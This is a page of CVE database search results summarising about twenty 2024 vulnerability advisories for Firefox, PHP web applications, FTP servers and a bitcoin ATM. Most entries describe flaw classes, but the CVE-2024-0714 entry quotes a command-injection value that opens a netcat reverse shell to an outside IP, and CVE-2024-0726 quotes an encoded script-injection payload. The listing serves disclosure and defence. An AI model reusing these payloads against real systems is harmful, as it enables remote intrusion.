Search Results (363407 CVEs found)

CVE Vendors Products Updated CVSS v3.1
CVE-2024-0745 1 Mozilla 1 Firefox 2024-11-21 8.8 High
The WebAudio `OscillatorNode` object was susceptible to a stack buffer overflow. This could have led to a potentially exploitable crash. This vulnerability affects Firefox < 122.
CVE-2024-0744 1 Mozilla 1 Firefox 2024-11-21 7.5 High
In some circumstances, JIT compiled code could have dereferenced a wild pointer value. This could have led to an exploitable crash. This vulnerability affects Firefox < 122.
CVE-2024-0739 1 Leadshop 1 Leadshop 2024-11-21 7.3 High
A vulnerability, which was classified as critical, was found in Hecheng Leadshop up to 1.4.20. Affected is an unknown function of the file /web/leadshop.php. The manipulation of the argument install leads to deserialization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-251562 is the identifier assigned to this vulnerability.
CVE-2024-0738 1 Garethhk 1 Mldong 2024-11-21 6.3 Medium
A vulnerability, which was classified as critical, has been found in 个人开源 mldong 1.0. This issue affects the function ExpressionEngine of the file com/mldong/modules/wf/engine/model/DecisionModel.java. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251561 was assigned to this vulnerability.
CVE-2024-0737 1 Xlightftpd 1 Xlight Ftp Server 2024-11-21 5.3 Medium
A vulnerability classified as problematic was found in Xlightftpd Xlight FTP Server 1.1. This vulnerability affects unknown code of the component Login. The manipulation of the argument user leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251560.
CVE-2024-0736 1 Easy File Sharing Ftp Server Project 1 Easy File Sharing Ftp Server 2024-11-21 5.3 Medium
A vulnerability classified as problematic has been found in EFS Easy File Sharing FTP 3.6. This affects an unknown part of the component Login. The manipulation of the argument password leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251559.
CVE-2024-0735 1 Mayurik 1 Online Tours \& Travels Management System 2024-11-21 6.3 Medium
A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been rated as critical. Affected by this issue is the function exec of the file admin/operations/expense.php. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251558 is the identifier assigned to this vulnerability.
CVE-2024-0730 1 Projectworlds 1 Online Time Table Generator 2024-11-21 6.3 Medium
A vulnerability, which was classified as critical, was found in Project Worlds Online Time Table Generator 1.0. This affects an unknown part of the file course_ajax.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251553 was assigned to this vulnerability.
CVE-2024-0726 1 Projectworlds 1 Student Project Allocation System 2024-11-21 4.3 Medium
A vulnerability was found in Project Worlds Student Project Allocation System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file admin_login.php of the component Admin Login Module. The manipulation of the argument msg with the input test%22%3Cscript%3Ealert(%27Torada%27)%3C/script%3E leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251549 was assigned to this vulnerability.
CVE-2024-0720 1 Factominer 1 Factoinvestigate 2024-11-21 3.5 Low
A vulnerability, which was classified as problematic, was found in FactoMineR FactoInvestigate up to 1.9. Affected is an unknown function of the component HTML Report Generator. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251544. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
CVE-2024-0718 1 Liuwy-dlsdys 1 Zhglxt 2024-11-21 2.4 Low
A vulnerability, which was classified as problematic, has been found in liuwy-dlsdys zhglxt 4.7.7. This issue affects some unknown processing of the file /oa/notify/edit of the component HTTP POST Request Handler. The manipulation of the argument notifyTitle leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251543.
CVE-2024-0716 1 Byzoro 2 Smart S150, Smart S150 Firmware 2024-11-21 3.1 Low
A vulnerability classified as problematic has been found in Byzoro Smart S150 Management Platform V31R02B15. This affects an unknown part of the file /log/download.php of the component Backup File Handler. The manipulation leads to information disclosure. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-251541 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
CVE-2024-0714 1 Sourcefabric 1 Phoniebox 2024-11-21 6.3 Medium
A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 -e /bin/bash; leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251540. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
CVE-2024-0712 1 Byzoro 2 Smart S150, Smart S150 Firmware 2024-11-21 7.3 High
A vulnerability was found in Byzoro Smart S150 Management Platform V31R02B15. It has been classified as critical. Affected is an unknown function of the file /useratte/inc/userattea.php. The manipulation leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-251538 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
CVE-2024-0696 1 Atrocore 1 Atropim 2024-11-21 3.5 Low
A vulnerability, which was classified as problematic, was found in AtroCore AtroPIM 1.8.4. This affects an unknown part of the file /#ProductSerie/view/ of the component Product Series Overview. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251481 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
CVE-2024-0676 1 Lamassu 4 Douro, Douro Firmware, Douro Ii and 1 more 2024-11-21 5.6 Medium
Weak password requirement vulnerability in Lamassu Bitcoin ATM Douro machines, in its 7.1 version , which allows a local user to interact with the machine where the application is installed, retrieve stored hashes from the machine and crack long 4-character passwords using a dictionary attack.
CVE-2024-0675 1 Lamassu 4 Douro, Douro Firmware, Douro Ii and 1 more 2024-11-21 6.3 Medium
Vulnerability of improper checking for unusual or exceptional conditions in Lamassu Bitcoin ATM Douro machines, in its 7.1 version, the exploitation of which could allow an attacker with physical access to the ATM to escape kiosk mode, access the underlying Xwindow interface and execute arbitrary commands as an unprivileged user.
CVE-2024-0651 1 Phpgurukul 1 Company Visitor Management System 2024-11-21 6.3 Medium
A vulnerability was found in PHPGurukul Company Visitor Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file search-visitor.php. The manipulation leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251377 was assigned to this vulnerability.
CVE-2024-0647 1 Sparksuite 1 Simplemde 2024-11-21 4.3 Medium
A vulnerability, which was classified as problematic, was found in Sparksuite SimpleMDE up to 1.11.2. This affects an unknown part of the component iFrame Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251373 was assigned to this vulnerability.
CVE-2024-0645 1 Explorerplusplus 1 Explorer\+\+ 2024-11-21 7.3 High
Buffer overflow vulnerability in Explorer++ affecting version 1.3.5.531. A local attacker could execute arbitrary code via a long filename argument by monitoring Structured Exception Handler (SEH) records.